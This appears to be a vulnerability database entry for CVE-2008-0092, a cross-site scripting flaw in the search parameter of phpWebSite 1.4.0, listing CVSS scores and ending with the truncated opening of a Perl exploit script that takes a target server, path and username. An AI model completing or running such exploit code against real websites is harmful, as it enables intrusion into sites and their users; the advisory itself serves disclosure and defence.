4.3
CVSSv2

CVE-2008-0092

Published: 04/01/2008 Updated: 15/10/2018
CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6
VMScore: 435
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N

Vulnerability Summary

Cross-site scripting (XSS) vulnerability in index.php in the search module in Appalachian State University phpWebSite 1.4.0 allows remote malicious users to inject arbitrary web script or HTML via the search parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

phpwebsite phpwebsite 1.4.0

Exploits

#!/usr/bin/perl use LWP::Simple; $serv = $ARGV[0]; $path = $ARGV[1]; $name = $ARGV[2]; sub usage { print "\nUsage: $0 [server] [path] [username] \n"; print "sever - URL\n"; print "path - path to indexphp\n"; print "username - name register user\n\n"; exit ();} sub work { print qq ...